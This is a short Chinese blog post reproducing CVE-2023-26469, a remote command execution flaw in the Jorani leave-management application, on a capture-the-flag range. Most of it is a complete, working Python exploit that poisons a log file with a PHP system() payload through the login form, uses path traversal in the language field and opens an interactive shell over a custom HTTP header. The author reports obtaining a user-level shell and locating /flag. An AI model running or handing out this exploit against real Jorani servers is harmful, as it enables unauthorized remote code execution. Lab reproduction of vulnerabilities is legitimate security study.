Jorani远程命令执行漏洞 CVE-2023-26469靶场复现
靶场界面
点击查看exp↓↓↓
""" vulnerability covered by CVE-2023-26469 """ import readline import requests import datetime import sys import re import base64 import random import string requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) msg = lambda x,y="\n":print(f'\x1b[92m[+]\x1b[0m {x}', end=y) err = lambda x,y="\n":print(f'\x1b[91m[x]\x1b[0m {x}', end=y) log = lambda x,y="\n":print(f'\x1b[93m[?]\x1b[0m {x}', end=y) CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"') CMD_PATTERN = re.compile('---------(.*?)---------', re.S) URLS = { 'login' : '/session/login', 'view' : '/pages/view/', } alphabet = string.ascii_uppercase HEADER_NAME = ''.join(random.choice(alphabet) for i in range(12)) BypassRedirect = { 'X-REQUESTED-WITH' : 'XMLHttpRequest', HEADER_NAME : "" } INPUT = "\x1b[92mjrjgjk\x1b[0m@\x1b[41mjorani\x1b[0m(PSEUDO-TERM)\n$ " # The input used for the pseudo term u = lambda x,y: x + URLS[y] POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>" PATH_TRAV_PAYLOAD = "../../application/logs" if __name__ == '__main__': print(""" /!\\ Do not use this if you are not authorized to /!\\ """) log("POC made by @jrjgjk (Guilhem RIOUX)", "\n\n") if(len(sys.argv) == 1): err(f"Usage: {sys.argv[0]} <url>") exit(0) log(f"Header used for exploit: {HEADER_NAME}") t = sys.argv[1] s = requests.Session() log("Requesting session cookie") res = s.get(u(t,"login"), verify = False) C = s.cookies.get_dict() Date = datetime.date.today() log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}" csrf_token = re.findall(CSRF_PATTERN, res.text)[0] log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'") log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'") msg(f"Recoveredd CSRF Token: {csrf_token}") data = { "csrf_test_jorani" : csrf_token, "last_page" : "session/login", "language" : PATH_TRAV_PAYLOAD, "login" : POISON_PAYLOAD, "CipheredValue" : "DummyPassword" } s.post(u(t,"login"), data=data) log(f"Accessing log file: {log_file_name}") exp_page = t + URLS['view'] + log_file_name ### Shell cmd = "" while True: cmd = input(INPUT) if(cmd in ['x', 'exit', 'quit']): break elif(cmd == ""): continue else: BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;") res = s.get(exp_page, headers=BypassRedirect) cmdRes = re.findall(CMD_PATTERN, res.text) try: print(cmdRes[0]) except: print(res.text) err("Wow, there was a problem, are you sure of the URL ??") err('exiting..') exit(0)
windows环境似乎不支持这个库,改用linux环境
成功弹出shell,普通用户权限
使用find / -name flag命令搜索到/flag
MU5735 R.I.P
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现
2020-08-05 Linux top命令用法(未完)
2020-08-05 Windows家庭版安装docker(添加Hyper-V组件、修改版本)
2020-08-05 关于Python 3.x中,使用print函数时出现的语法错误(SyntaxError: invalid syntax)的问题的原因 以及python2.x和3.x差别
2020-08-05 pip install urllib2不能安装
2020-08-05 python3安装poster库时报错解决:ERROR: Command errored out with exit status 1: python setup.py egg_info Check the logs for full command output.